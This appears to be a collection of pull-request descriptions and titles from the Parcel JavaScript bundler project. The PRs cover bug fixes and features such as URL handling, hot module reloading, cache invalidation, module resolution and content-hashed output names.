package.json
Looks like it's not required any more as we're using `babel-preset-env` in its place.
=> ➖ Remove `babel-preset-es2015` as a dev dependency

package.json, src/Asset.js, src/assets/HTMLAsset.js, test/html.js, test/integration/html/index.html
Resolves #12 
While `addURLDependency` checked for URLs, `HTMLAsset` was always prepending the public path. This PR adds a new (small) dependency `is-url`, a common utility for this, and adds the necessary check in `HTMLAsset`
=> Check if asset path is a URL before prepending public path

src/utils/is-url.js, test/css.js, test/integration/css-url/index.css, test/integration/html/index.html
Parcel is trying to "import" data URLs. This PR ignore URLs when they start with `data:`.
=> Do not try to import data: tel: mailto: something: URLs

src/visitors/dependencies.js, test/integration/es6-default-only/index.js, test/javascript.js, yarn.lock
This fixes an issue where modules which only had a default export would not be marked as ES6 and wouldn't then have it's module syntax converted to CommonJS. So something like the below would fail:
```javascript
const a = 1;
const b = 2;
export default () => a + b;
```
Default exports would be transpiled _if_ they had imports, as the visitor for the import statement would flag the module as ES6 (this is how the ‘Hello World’ example works on the home page).
I think this also fixes https://github.com/parcel-bundler/parcel/issues/30
There is also a yarn.lock format update that I brought in.
=> Fix default only exports

src/FSCache.js
This pull request addresses #62. Updated `FSCache` to also include current Parcel version also in the package key.
=> Make current Parcel version part of cache key.

bin/cli.js
Hey there. Nice project, I am really excited about the things happening here.
While testing this project to create a react app I noticed that process.env.NODE_ENV is not set for the serve command. So babel-plugin-react-app shows an error with ```Using `babel-preset-react-app` requires that you specify `NODE_ENV` or `BABEL_ENV` environment variables. Valid values are "development", "test", and "production". Instead, received: undefined.```.
I think it makes sense to use this as a default. Thoughts?
=> use NODE_ENV = development by default on parcel serve

src/Bundler.js, src/HMRServer.js, src/Server.js, src/builtins/hmr-runtime.js, test/hmr.js, test/server.js
Closes #100
- Emit `error` events on the HMR socket when the bundler fails
- Emit `error` events on new HMR sockets when the bundler has not completed successfully since the last error
- Emit `error-resolved` events on the HMR socket when the bundler passes after failing
- Serve 500s when the build fails
=> Notify browser on error

src/builtins/bundle-loader.js
related to #131 
The rest of the code in this file uses `var`, and this was probably a typo.
=> Use `var` over `let` in bundle loader built-in

src/Bundler.js
Currently no error/warning is shown whenever a plugin failed loading.
Added the logger line to the error handling, to give some feedback to the user if something is wrong with the plugin.
=> Send warning to logger if plugin loading failed

bin/cli.js
Hi, awesome project you got there.
Noticed, when looking for it, there's no description in `--help` how to output the current version so i added it.
=> added version option to command description

bin/cli.js, package.json, yarn.lock
Add a new option `-o` `--open` to automatically launch the dev server in the default browser. 
Using [opn](https://www.npmjs.com/package/opn) to launch the browser, which is also used by [webpack-dev-server](https://github.com/webpack/webpack-dev-server/blob/0a8f8965fba4a46a862497f6e7d1ad9377040a15/bin/webpack-dev-server.js#L468), [browser-sync](https://github.com/BrowserSync/browser-sync/blob/3aced708d47f032905721d01dd435d809d8feb33/lib/utils.js#L175-L189), [create-react-app](https://github.com/facebookincubator/create-react-app/blob/2e82ebb3371731a5c4e346f310848ddb23fd0976/packages/react-dev-utils/openBrowser.js#L100), and a lot [more](https://www.npmjs.com/browse/depended/opn).
=> Add `--open` option to automatically launch in default browser

src/Asset.js
When requiring `parcel-bundler/{lib,src}/assets/*` this error is thrown :
``` 
parcel/src/assets/RawAsset.js:4
class RawAsset extends Asset {
TypeError: Class extends value #<Object> is not a constructor or null
```
This is because `Asset.js` depends on `Parser.js` which depends on `RawAsset.js` and it depends on `Asset.js`...
This PR just remove the `const Parser = require('./Parser')` on `Asset.js` as it is unused, and fixes the bug above.
=> Remove circular require in Asset.js

src/Resolver.js
#158
Stylus will add `@import 'stylus\lib\functions'` to the beginning of `style.styl` file.
Now call [`resolver.resolveSync('stylus\lib\functions', 'style.styl')`](https://github.com/parcel-bundler/parcel/blob/cf6902a30a4acc49a5b4572be42781ebf3ed356a/src/assets/StylusAsset.js#L58) in StylusAsset, and `stylus\lib\functions\index.js` is returned.
`stylus\lib\functions\index.styl` may be what we want, so we tell Resolver to give high priority to the extension (`.styl`) found in parent file (`style.styl`).
=> feat(Resolver): give high priority to extension of parent file

package.json, src/WorkerFarm.js
The problem is with heroku and some CI, the physical-cpu-count linux branch requires a binary and access not provided by these environments.
=> Only use os.cpus() and filter out core like physical-cpu-count did

src/assets/RawAsset.js, test/javascript.js, test/typescript.js
Hello ! 
https://github.com/jaredpalmer/react-parcel-example/issues/6 https://github.com/parcel-bundler/parcel/issues/96 #186 
In RawAsset, the generated bundle name was not prepended by the public url.
Prepend RawAsset generated bundle name with options.publicURL (defaults to dist). Updated tests to reflect the change.
Passing. I also, tested my fork against https://github.com/jaredpalmer/react-parcel-example and it works in both dev and prod mode. 
Thanks for the great work on Parcel ! 👍 
Please feel free to close if this code affects other parts negatively.
=> Fix RawAsset loading.

src/builtins/hmr-runtime.js
This is the only builtin that uses non-es3 code. 
My use-case is that I'm debugging our site in IE11, and I can't use `parcel watch` for it at present, as the HMR-runtime builtin causes the script to die.
this closes #131 as far as i'm concerned
=> Make hmr-runtime builtin ES3-compatible

src/builtins/bundle-loader.js, test/integration/dynamic-references-raw/index.js, test/integration/dynamic-references-raw/local.js, test/integration/dynamic-references-raw/test.txt, test/javascript.js
For example given the following files:
_cat.js_
```
import cat from './cat.jpg';
export default function renderCat() {
// renders <img src={cat} > somehow
}
```
_app.js_
```
import('./cat.js').then(modules => modules.default())
```
Throws `TypeError: bundleLoaders[type] is not a function` because bundleLoaders has just css and js handlers.
Note this is different from dynamic importing the jpg file directly, which I believe is not supported in the moment. In this case we are lazy loading a js file but it depends on a raw asset.
=> Fix error when dynamic importing js files which imports raw files

src/visitors/globals.js, test/integration/env/index.js, test/javascript.js
Closes: https://github.com/parcel-bundler/parcel/issues/117
This is a line from current code
```replace(ancestors[ancestors.length - 2], node, val);```
Parameters are called
```replace(parent, from, to)```
I just realized that `from` parameter is referentially same (will pass `obj === obj` comparison) as one of the fields somewhere in `parent`. So instead of manipulating in `parent`, we can change MemberExpression (or whatever node type of `from` is) into StringLiteral by just replacing its parameters while keeping its object identity.
=> fix: global env problem by morphing a Node object

src/Bundler.js, test/integration/plugins/sub-folder/index.js, test/integration/plugins/sub-folder/test.txt, test/plugins.js
Currently the package.json file is only searched for within the directory and not in parent directories, this should fix this.
As discussed here: closes #167
=> Package.json can't be found bugfix

src/builtins/hmr-runtime.js
IE doesn't support template literal.
related : https://github.com/parcel-bundler/parcel/pull/169
=> template literal fix for IE

src/assets/TypeScriptAsset.js
If a `tsconfig.json` is found then the defaults are not applied to the configuration. This PR merge the defaults with the user configuration if such case.
=> Merge TypeScript configuration with defaults if found

package.json, src/utils/config.js, yarn.lock
Enable JSON5 .babelrc, including trailing comma and comments.
It is same that babel-core is handling json5.
https://github.com/babel/babel/blob/a89171910fa2e5b026ec87aa5bcfc1e0aa3aefa2/packages/babel-core/src/config/loading/files/configuration.js#L195
=> Enable JSON5-flavored .babelrc

src/assets/JSAsset.js
So that classes that extend JSAsset can get the base Babylon config with `super.getBabylonOptions()`, and don't have to duplicate it.
Would like to use this in an example plugin which uses a fork of Babylon, but can see it being useful for a plugin in that requires extra options but would still like to use the base options.
pull request for discusson.
=> Move JSAsset's options gathering code into separate method

src/FSCache.js, test/hmr.js
Instead of re-adding (https://github.com/parcel-bundler/parcel/pull/269) `parse-json` dependency to parcel i changed `parse-json` requires in favour of `json5` on the remaining places.
The reason is that https://github.com/parcel-bundler/parcel/pull/256 removed parse-json dep, but was not changed in these two files i have changed it in.
thanks @DeMoorJasper for figuring this out and point me in the right direction.
=> changed parse-json requires to json5

src/Parser.js
closes #268 
This just adds the extension, for the extended syntax it's up to the user to add `postcss-nested`, `postcss-mixins` etc and add them to their `.postcssrc` as with modules.
=> Add .pcss as a CSSAsset extension

src/Server.js
When using custom template Asset (like [parcel-plugin-pug](https://github.com/Ty3uK/parcel-plugin-pug)) with `parcel src/index.pug` it generates correct index.html, but basename of file is index.pug rather than index.html, so server sends incorrect file.
=> Fix dev server index file

src/builtins/hmr-runtime.js
Issue & PR may be related: #169 #131 
hmr-runtime is inserted directly, so we shouldn't use arrow function here.
This PR #320 introduced the issue again : https://github.com/parcel-bundler/parcel/pull/320/files#diff-84b7f03297bb09457de68d252f8af43aR36
=> Remove arrow function syntax in hmr-runtime

bin/cli.js
The `--port` command was being passed as a string, causing an equality check to fail since Node is returning it as an integer, and the `options.port` was a string. With this PR, the port is parsed as an integer, and the warning message goes away.
Before:
```sh
Server running at http://localhost:9966 - configured port 9966 could not be used
```
After:
```sh
Server running at http://localhost:9966 
```
=> Parse --port string as an integer

src/Resolver.js
This is needed for a lot of libraries who ship their Node.js version in the `main` field (see #298). This will also use the ES6 modules version of some libraries (instead of UMD) and might lead to a better bundling/sharing of dependencies.
=> Resolve "module", "jsnext:main" and "browser" before "main"

src/Asset.js, src/Bundler.js, src/Server.js, test/html.js, test/integration/html-root/index.html, test/integration/html-root/index2.js, test/integration/html-root/main.js, test/integration/html-root/other.html, test/integration/html-root/util.js
If we have 
index.html
-other.html
Other.html
-index.html
In other.html index.html is being replaced with <hash>.html. This shouldn't happen.
=> Root file shouldn't be hashed.

src/Bundler.js
When a file path can not be resolved the error message is cleaned
up but the relative path to file is displayed.
In cases where a mistake have been made this path can be very confusing,
like `Cannot resolve dependency './../../../../../../main.js'` for when
a path starts with `/`.
This PR resolves path into an absolute path in hope of
reducing confusion and minimize cognitive overhead of `../` chasing.
The above example would now display 
```
Cannot resolve dependency '/main.js' at '/main.js'
```
and for relative unresolvable path
```
Cannot resolve dependency './even-more/x.js' at '/mnt/c/Users/pom/Development/pom/parcel-implementation/src/script/more/even-more/x.js'
```
=> Display absolute path on failed dependency resolve.

.editorconfig, .gitattributes
This is to avoid having to deal with line endings on different OSes.
I was going to instead make a PR adding `.editorconfig` but then realized that not everyone might have an extension/support for it.
Let me know your thoughts. Cheers! 💖
<hr />
__EDIT__: After review, opting for `.editorconfig` instead. 😅
=> Add `.editorconfig`

src/Resolver.js, test/integration/resolve-entries/both-fields.js, test/integration/resolve-entries/browser-multiple.js, test/integration/resolve-entries/browser.js, test/integration/resolve-entries/jsnext-field.js, test/integration/resolve-entries/main-field.js, test/integration/resolve-entries/module-field.js, test/integration/resolve-entries/pkg-both/es6.module.js, test/integration/resolve-entries/pkg-both/package.json, test/integration/resolve-entries/pkg-browser-multiple/package.json, test/integration/resolve-entries/pkg-browser-multiple/projected-module.js, test/integration/resolve-entries/pkg-browser/browser-module.js, test/integration/resolve-entries/pkg-browser/package.json, test/integration/resolve-entries/pkg-es6-module/es6.module.js, test/integration/resolve-entries/pkg-es6-module/package.json, test/integration/resolve-entries/pkg-jsnext-module/jsnext.module.js, test/integration/resolve-entries/pkg-jsnext-module/package.json, test/integration/resolve-entries/pkg-main/main.js, test/integration/resolve-entries/pkg-main/package.json, test/javascript.js
This is a follow up for #299. I added tests a fixed a bug where `react-dom` wouldn't load because of how it defines it's `browser` field. I removed the `browser` handling because it turns out `browser-resolve` already resolves it.
=> Add ES6 modules resolver tests

package.json, src/utils/installPackage.js, test/css.js
Use [cross-spawn](https://www.npmjs.com/package/cross-spawn) to spawn process.
=> Use `cross-spawn` to perform autoinstall

src/transforms/posthtml.js, test/html.js, test/integration/html/index.html
#372 
Currently, HTML minification strips the space between two <i> tags. The result might become "helloworld"
```
<i>hello</i> <i>world</i>
```
This PR would prevent that from happening.
=> Conserve the html spacing between tags

src/assets/RawAsset.js, test/javascript.js, test/typescript.js
#160 It seems that this PR didn't fix related issues. So I fixed it and it works fine in [Raincal/parcel-reason-react-app](https://github.com/Raincal/parcel-reason-react-app.git) and [jaredpalmer/react-parcel-example](https://github.com/jaredpalmer/react-parcel-example.git)
=> fix(RawAsset): fix incorrect bundle path

src/Asset.js
tweek & comment only chage.
`async pretransform()` was uncommented among the empty implementation methods of the `Asset` class, it a little strange for me.
of course you could reject PR, if there is any reason.
thanks!
=> standardize comments on empty implementation method

src/assets/JSAsset.js, src/visitors/dependencies.js, src/visitors/globals.js, src/visitors/matches-pattern.js, test/integration/service-worker/index.js, test/integration/service-worker/worker.js, test/javascript.js
Adds support for `serviceWorker.register('foo.js')`.
Maybe we should support `self.importScripts('foo.js', 'bar.js', ...);` too?
=> Add url dependency for serviceWorker.register calls

src/utils/is-url.js, test/is-url.js
saw this in the chat: https://parcel-bundler.slack.com/archives/C8B26V8RF/p1514579681000034
=> handle app store url scheme

src/Bundler.js, src/assets/LESSAsset.js, test/html.js, test/integration/child-bundle-different-types/index.html, test/integration/child-bundle-different-types/index.js, test/integration/child-bundle-different-types/main.js, test/integration/child-bundle-different-types/other.html, test/integration/child-bundle-different-types/other.js, test/integration/child-bundle-different-types/util.js
#294 #326 
This PR potentially fixes the issues mentioned above. It does the following
case (i):
If the below is true => i.e both types are the same (parent Bundle is JS and commonBundle is also JS) move it the common ancestor.
```
if (
asset.parentBundle !== commonBundle &&
asset.parentBundle.type === commonBundle.type
) {
this.moveAssetToBundle(asset, commonBundle);
return;
}
```
case 2:
If they aren't the same, for eg: parentBundle is JS and commonBundle is HTML. Then allow it to continue further so that it adds this asset to the immediate parent.
case 3: 
If both parent bundles are equal, then just return.
```
if (asset.parentBundle !== bundle) {
```
=> Potential fix to parcel bundling issues when asset parent & commonBundle types differ

src/transforms/postcss.js
=> Make cssnano configurable

src/transforms/posthtml.js, test/html.js, test/integration/htmlnano-config/.htmlnanorc, test/integration/htmlnano-config/index.html
Closes #429.
If Bundler minify option is true, it parses opts from `package.json`, `.htmlnanorc` or `.htmlnanorc.js`.
Defaults to `{collapseWhitespace: 'conservative'}`.
=> Make htmlnano configurable for production

src/assets/HTMLAsset.js, test/html.js, test/integration/posthtml-assets/.posthtmlrc.js, test/integration/posthtml-assets/index.html, test/integration/posthtml-assets/index.js, test/integration/posthtml-assets/other.html
Parcel assumes it is working with complete HTML when collecting dependencies, but until it is transformed, not all the assets may be visible. The test includes an example with `posthtml-include`, but I also had issues with `posthtml-extend`.
=> Transform HTML prior to collecting dependencies

src/assets/HTMLAsset.js, test/html.js, test/integration/html-attr-order/index.html, test/integration/html-attr-order/other.html
`<a href="other.html">other</a>` worked as expected, but `<a class="hi" href="other.html">other</a> would not.
=> Find a[href] dependencies when other attrs precede it

src/FSCache.js
Some dependencies are pre-compiled into their parent assets, e.g. stylus imports. But we still need to invalidate the cache if any of those files change.
Now the FSCache looks for deps with `includedInParent: true`, and stores an mtime in the cache file. When reading from the cache, those deps are checked to see if they changed and if so, the parent asset is invalidated.
=> Invalidate cache when dependencies included in parent change

src/Asset.js, src/Bundler.js, src/HMRServer.js, src/assets/JSAsset.js, src/assets/LESSAsset.js, src/assets/SASSAsset.js, src/assets/StylusAsset.js, src/assets/TypeScriptAsset.js, src/packagers/JSPackager.js, src/transforms/babel.js, src/transforms/uglify.js, src/utils/config.js, src/visitors/globals.js, src/worker.js, test/integration/babel/.babelrc, test/integration/babel/.eslintrc.json, test/integration/babel/foo.js, test/integration/babel/index.js, test/watcher.js
Closes #297. Fixes #66.
This PR does three things:
1. Adds config files as dependencies. This means that they are automatically watched, so for example if you change your `.babelrc`, Parcel will immediately recompile all files that depend on it. Also, if you restart Parcel after making changes, those files will also be recompiled (since #514).
2. Adds a `cacheData` object to assets, and a `shouldInvalidate` method which accepts a cacheData object to compare. If it returns false, the asset is re-generated. JSAsset uses this to implement environment variable cache invalidation. If your JS file has `process.env.MY_ENV`, and you change `MY_ENV` to a new value, the cache will be invalidated.
3. Fixes an issue where assets that have multiple parents that include them weren't recompiled on …
=> Invalidate cache on config and environment variable changes

src/Bundler.js, test/html.js, test/integration/circular/.eslintrc.json, test/integration/circular/about.html, test/integration/circular/about.js, test/integration/circular/index.html, test/integration/circular/index.js, test/integration/circular/test.html
Slightly simpler, more generic version of #489.
There were two issues:
1. Infinite recursion on circular bundles. This is solved by tracking the current bundle stack.
2. HTML files getting merged into one bundle. This was because Parcel tried to hoist the common dependencies. However, this should never be done for the entry asset of a bundle since those assets were explicitly requested to be placed in a separate bundle (deps marked as `dynamic`).
Added test covers both cases. cc. @shawwn @ipmb
=> Fix circular bundles, and never hoist the entry asset

src/builtins/hmr-runtime.js
The name of the global object may differ based on the context in which the
script is running. For example, web workers use "self" instead of "window". As
location is a property of the global, it can be referenced directly as a global
variable, which avoids having to deal with this naming inconsistency.
Fixes #528
=> Do not use window global in HMR runtime

package.json
- "description" property is missing in package.json
- because of that the result of search in https://www.npmjs.com/ looks ugly
This PR solves the above problem.
=> Add missing description property in package.json

src/Logger.js, src/utils/emoji.js
because we all love emojis, don't we?
=> Add a warning emoji ⚠️ to the logger

CONTRIBUTING.md, src/WorkerFarm.js
Per the slack convo, `PARCEL_WORKERS` environment variable controls how many workers to spawn, and `PARCEL_WORKERS=0` makes all code run on the main thread.
`PARCEL_WORKERS=0 yarn test` runs about 33% faster.
=> Use PARCEL_WORKERS environment variable

src/utils/emoji.js
I've started using [Hyper](https://hyper.is/) on Windows, which supports emoji. This PR enhances the support check to detect `xterm-256color` to enable emoji's for all platforms using [xterm.js](https://github.com/xtermjs/xterm.js) instead of just VS Code (which uses xterm.js).
Hyper:
VS Code:
=> Improve Windows emoji support detection

src/assets/RustAsset.js, test/integration/rust-cargo/Cargo.toml
Currently, parcel will not successfully bundle rust code if the cargo project name has a hyphen in it. This PR fixes this bug.
In Rust, hyphens in project names are converted to underscores both in code and in output file names.
=> Fix rust projects with hyphenated names

package.json, src/WorkerFarm.js, src/worker.js, yarn.lock
In the tests there sometimes accurs an ipc closed while sending data error, this is due to the main thread being killed before the children died.
This should force-kill the children, preventing this from happening. Another solution is awaiting the super.end using a promise or callback but this caused many tests to fail and in theory this fix would be just as solid and will not wait for unused data to be received.
=> Fix for ipc closed error in tests

src/cli.js
The alias was clashing with the alias for `help`.
<hr />
Closes #655.
=> Remove `-h` alias for `hmr-port` option

src/builtins/hmr-runtime.js, src/builtins/prelude.js, test/hmr.js, test/integration/hmr-callbacks/index.js
Just letting `module.id` to exists.
Partially fixes #619.
Making parcel compatible with React-hot-loader v4 (https://github.com/gaearon/react-hot-loader/pull/818)
=> Add 'id' to the module variable

CONTRIBUTING.md
Adds multiple options for linking to local copy of parcel during development, to the contributing guidelines.
=> Adds linking to local parcel guideline to contributing file

src/Asset.js, src/utils/urlJoin.js, test/asset.js, test/url-join.js
related to #612 
1. updates addURLDependency to preserve asset path's query and hash
2. updates urlJoin to preserve asset's query and hash instead of preserving the public url's query and hash.
=> preserve query and hash when adding url dep

src/assets/HTMLAsset.js, test/html.js, test/integration/html/icons.svg, test/integration/html/index.html
Hello! I'm looking for feedback on adding some basic support for svg sprites to parcel... Here's an example:
Assuming there's a svg sprite sheet named `icons.svg`, it would be nice if HTMLAsset added url dependencies when it encountered these types of references:
```html
...
<body>
...
<svg>
<use xlink:href="icons.svg#icon-repo-pull"></use>
</svg>
...
</body>
...
```
For this to work the url's hash needs to be preserved. This got me thinking- should HTMLAsset preserve each url dependency's search and hash components in all cases? For example, bundling html with `<a href="test.html?foo=bar#baz">test</a>` results in `<a href="/dist/eb3da15aa2712be35d36a6920165de75.html">test</a>` which seems like a bug/missing feature.
Thoughts?
=> minimal svg sprite support

src/utils/installPackage.js, src/utils/localRequire.js, test/css.js
`peerDependencies` are now installed automatically when `installPackage` is run. Only direct-peers are currently installed (e.g. peers of peers are ignored).
Fortunately, the `postcss-cssnext` tests could be tapped into to verify the peer functionality without adding more installation tests... which are slow. 
Independently verified the `graphql-tag` `graphql` use-case as well by running the integration test scenario ([here](https://github.com/parcel-bundler/parcel/tree/master/test/integration/graphql)) with a package.json. Both install as expected! 
---
Closes #419
=> Auto-install peerDependencies 

src/packagers/HTMLPackager.js, test/html.js, test/integration/html-css-optional-elements/index.css, test/integration/html-css-optional-elements/index.html, test/integration/html-css-optional-elements/index.js, test/integration/html-css-optional-elements/other.js
Fixes #633 if we want to support this case.
=> Inject HTML tag if missing

src/Bundler.js, src/FSCache.js, src/HMRServer.js, src/Logger.js, src/Server.js, src/WorkerFarm.js, src/transforms/uglify.js, src/utils/generateCertificate.js
Converts Logger into a singleton, so everything outside of bundler can use it.
Also created IPC for logger so that assets can send messages to the workerfarm, instead of overloading logger singleton.
After seeing #207 was too big of change and failing times and times again to fix the glitches with status i thought it be a better idea to just extract the singleton part of that PR and make a fresh clean new PR, without the conflicts, ...
=> Logger singleton

src/utils/PromiseQueue.js
When PromiseQueue is called with no jobs it returns null instead of a promise that is already resolved with an empty set. This causes "await run()" to evaluate to null, and a "Cannot read property 'Symbol(Symbol.iterator)' of null" error.
Fixes #664
=> fix PromiseQueue returning null when there are no jobs

test/watcher.js
The build https://ci.appveyor.com/project/devongovett/parcel/build/1.0.821 failed. The most probable reason is that the `sleep(1000)` took little less than one second because `setTimeout` is not precise in any way. To avoid further failure, add a margin of error by sleeping 1.1 seconds.
=> Flaky test: Don't expect setTimeout to be exact

package.json
Fixes #561 -- Parcel doesn't properly build on my Windows 10 machine without this.
=> Add babel-template and babel-types to package.json

src/transforms/postcss.js, test/css.js
Pass `{safe: true}` to cssnano by default, to avoid the dangers of the advanced transforms that it would enable by default in cssnano@3.x
Adds a test (well co-opts an existing test) to ensure that @font-face files make it through to the final css bundle when `{ production: true }`
Once cssnano v4 is finally released as stable, the default options can be removed, as cssnano 4 will default to safe transforms only.
Fix #698
=> Safe cssnano transforms by default

src/Logger.js, src/WorkerFarm.js, src/visitors/fs.js, test/fs.js, test/integration/fs-file-non-evaluable/index.js, test/integration/fs-options-non-evaluable/index.js
This PR will warn instead of throwing when a `fs` call cannot be evaluated.
Remarks :
- I added a commit to create a logger singleton, we might want to wait for #462 to land first and then remove the commit.
- It warns using a code frame, maybe it's too much, waiting for your feedback for that
- The warning will not be propagated to the browser console
- If the call cannot be evaluated then the `fs` module will be required as an empty module (`Uncaught TypeError: fs.readFileSync is not a function` on the runtime)
- See the `nodeNotEvaluated` var in `fs.js`, I don't know if it's elegant
- Should we handle the case where the filename is not a string? (eg. `readFileSync({notAString: true})`)
TODO:
=> [WIP/RFC] Warn when a fs call cannot be evaluated

src/Bundler.js, src/assets/JSAsset.js, src/visitors/dependencies.js, test/integration/optional-dep/index.js, test/javascript.js
Put a `require` call inside a try…catch block, and it becomes optional. If that dependency cannot be resolved, it will throw a runtime error instead of a build time one. Fixes #210.
=> Add support for optional dependencies

src/builtins/bundle-loader.js
I stumbled across this issue using a plugin to rename the output files
=> Allow dots in lazy loaded file names

src/Server.js
This should fix #570 👀
Regards
Nico
=> Add Access-Control header for CORS

src/assets/HTMLAsset.js
Hey 👋 
This PR fixes the failing test ([here](https://github.com/parcel-bundler/parcel/blob/master/test/html.js#L266)) on CI for Node v8. The test is failing consistently after #799 that I think bumped several versions of 3rd-party dependencies by accident. The specific dependency bump that causes the fail is [posthtml-parser](https://github.com/posthtml/posthtml-parser) (from v0.1.3 to v0.4.0).
The only breaking change was [this change](https://github.com/posthtml/posthtml-parser/commit/21450896d5f09d394497c0361882266e7a166f24) that changed the default `lowerCaseAttributeNames` option that is being passed to [htmlparser2](https://github.com/fb55/htmlparser2). This PR passes this option as true to keep previous behavior while still keeping the new versions (should be good if nothing …
=> Pass lowerCaseAttributeNames: true to posthtml-parser (fix version bump)

src/HMRServer.js
It looks like `ws` changed the error passed to `onerror` to be an `ErrorEvent` (https://github.com/websockets/ws/pull/1261) in 4.0, which doesn't have `code` at the top-level.
The guard for ECONNRESET was falling through when closing the tab in chrome and throwing an error at the log line since err isn't a string which ends up killing the server.
=> Update HMRServer handleSocketError for ErrorEvent

src/transforms/babel.js, test/integration/jsx-nervjs/index.js, test/integration/jsx-nervjs/package.json, test/javascript.js
Ref: https://github.com/NervJS/nerv
=> add JSX support for "Nerv"

src/utils/getTargetEngines.js
If bundling anything with `--target=node`, the following error will be thrown:
```
🚨  Error: Invalid version passed for target "node": ">= 6.0.0". Versions must be in semver format (major.minor.patch)
at /home/guilherme/Cubos/zak-api/node_modules/babel-preset-env/lib/index.js:69:13
at Array.filter (<anonymous>)
at isPluginRequired (/home/guilherme/Cubos/zak-api/node_modules/babel-preset-env/lib/index.js:59:54)
at filterItem (/home/guilherme/Cubos/zak-api/node_modules/babel-preset-env/lib/index.js:99:20)
at Array.filter (<anonymous>)
at Object.buildPreset [as default] (/home/guilherme/Cubos/zak-api/node_modules/babel-preset-env/lib/index.js:149:56)
at getEnvPlugins (/home/guilherme/Cubos/zak-api/node_modules/parcel-bundler/src/transforms/babel.js:250:34)
at getEnvConfig …
```
=> Fix babel handling for node: DEFAULT_ENGINES

src/transforms/babel.js, test/integration/jsx-hyperapp/index.js, test/integration/jsx-hyperapp/package.json, test/javascript.js
Hi @devongovett! This PR adds [Hyperapp](https://github.com/hyperapp/hyperapp) support to Parcel!
=> Add JSX support for Hyperapp.

.npmignore, package.json
There're some unnecessary files (eslint, prettier, CI configs, etc) in `node_modules/parcel-bundler` after installation. 
This PR removes them, leaving only what is needed.
=> Remove unnecessary files from npm

test/babel-register.js, test/mocha.opts
Hey,
#789 added `babel-register` before running `mocha` tests. Using `babel-register` slows down tests, adds flakiness and it's redundant for Node v8.x.x.
This PR adds `babel-regsiter` only for when Node's version is <8.
=> Use babel-register for tests only with node < 8

src/Bundler.js
I need to get the development server's port number for use in a plugin. Attaching the server to the bundler allows me to call `bundler.server.address().port`. This seems to be the only way to access it since the server's port can vary if the user provided port is already being used.
=> Add server reference to bundler

test/rust.js
Make the build green again :)
Why the test was red: with Rust 1.24 bundle size got larger for some reason, but it was still reasonably small (295 bytes vs 17961 bytes). I thought.. why don't we just compare not minified bundle against the minified one?
=> Fix Rust wasm-gc test

src/SourceMap.js, src/transforms/uglify.js
Just a couple improvements. Please test them out and merge if you like it @DeMoorJasper! 😄 
1. Fixed a couple bugs I found in testing with the mapping search going out of bounds.
2. Made the uglify sourcemaps slightly faster by using the raw mappings rather than generating and parsing the sourcemap. This is done using the `output.source_map` option which is normally uglify's [internal sourcemap generator](https://github.com/mishoo/UglifyJS2/blob/082e004b872ecb158e5a28702898688742b5da86/lib/sourcemap.js) but we emulate the add function to point to our sourcemap instead.
=> Uglify Sourcemap improvements

src/utils/getTargetEngines.js
When `.babelrc` has no `"targets"` option in `env`, like:
```
{
"presets": ["env"]
}
```
Then it will cause an error:
```
Cannot read property 'targets' of undefined
at loadBabelrc (/node_modules/parcel-bundler/src/utils/getTargetEngines.js:113:23)
at <anonymous>
```
This PR is to fix it.
=> Fix error when no "targets" options in .babelrc

src/utils/bundleReport.js
Untangles if/else in favor of returns.
=> Refactor prettifySize

src/transforms/babel.js
The default descriptor for 'configurable'is `false`, which causes the error `Cannot delete property 'internal' of #<Object>`
I am developing a plugin (https://github.com/dalcib/parcel-plugin-react-native-web) and found this error.
=> Fix property descriptor of config.internal in transforms/babel.js

src/Bundler.js
=> Fixes electon hmr bug

package.json, src/Asset.js, yarn.lock
It does not work because not all part of the code agree on this.
Also, I guess we ***want*** the hash anyways, as a cache buster.
Take this simple example:
`$ tree src`
```sh
src
└── index.html
```
`$ cat src/index.html`
```html
<script type="text/javascript" src="../node_modules/jquery/dist/jquery.js"></script>
```
```sh
$ ./node_modules/.bin/parcel build src/index.html
```
`$ tree dist`
```sh
dist
├── index.html
├── jquery.js
└── jquery.map
```
`$ cat dist/index.html`
```html
<script src="/dist/1d486a6abe13f93fbb4e2e63028ada7c.js"></script>
```
This will cause a 404!
```sh
$ ./node_modules/.bin/parcel build src/index.html
```
`$ tree dist`
```sh
dist
├── 1d486a6abe13f93fbb4e2e63028ada7c.js
├── 1d486a6abe13f93fbb4e2e63028ada7c.map
└── index.html
```
`$ cat dist/index.html`
```html …
```
=> Do not try to use the sanitized package name as the bundle name

src/Bundler.js
Fixes regression introduced in #921
=> Fix HMR hostname in browser

.gitignore
i made a pr and had accidentally committed yarn-debug.log, hence this PR.
should perhaps add more files to ignore, similar to the github's .gitignore template
=> remove logs files from getting committed

src/Resolver.js, test/integration/resolver/node_modules/@scope/pkg/package.json, test/resolver.js
#850 doesn't support scoped modules, ie. `@angular/core`
=> Fix scoped modules

src/Asset.js, src/Bundle.js, src/Bundler.js, src/Logger.js, src/Server.js, src/assets/HTMLAsset.js, src/assets/RawAsset.js, src/packagers/CSSPackager.js, src/packagers/HTMLPackager.js, src/packagers/JSPackager.js, src/packagers/Packager.js, src/packagers/RawPackager.js, src/packagers/SourceMapPackager.js, src/utils/md5.js, src/visitors/dependencies.js, test/contentHashing.js, test/css.js, test/html.js, test/javascript.js, test/less.js, test/logger.js, test/sass.js, test/stylus.js, test/typescript.js
This implements the strategy described in #872. In production mode, a hash of bundle content is appended to names of files that aren't entry points (e.g. HTML files, things linked to a `<a href>`, service workers, etc.). Unhashed files retain their original name, and path relative to the main entry point.
In development mode, rather than using content hashes, the hash of the filename is used as before, so that filenames don't change during development. The hashes are necessary at all to avoid name collisions since the file structure is flattened. In addition, the filenames look more similar to the real production ones - the hashes just don't change.
It works by using a temporary filename (md5 of asset path) as references (which should be unique), and at the end, once file contents is …
=> Content hash output file names

src/Server.js, test/server.js
When serving HTML bundle with publicUrl="/", allow the server to send static assets other than html.
Fixes #782
=> HTML bundle serving bug.

src/assets/SASSAsset.js
This is a fix for #1032 - gives the possibility to use globals variables within the `data` attribute - same as https://github.com/webpack-contrib/sass-loader/blob/master/lib/normalizeOptions.js#L24
=> Add data so it is possible to include globals scss variables

src/Bundler.js, src/Logger.js, src/cli.js
Related to #993.
Please let me know if I should add / change something.
Regards
Nico
=> Add option for log level

src/Asset.js, src/Bundler.js, src/packagers/JSPackager.js, src/packagers/Packager.js
After #1025, HMR was broken since bundle names weren’t properly being replaced with the final hashed versions. This was happening in the Packager, but the HMR update happens independently from packaging.
This patch moves that bundle name replacement into a separate step prior to both HMR and packaging. This way it happens in one place that affects both outputs.
=> Fix HMR with content hashing changes

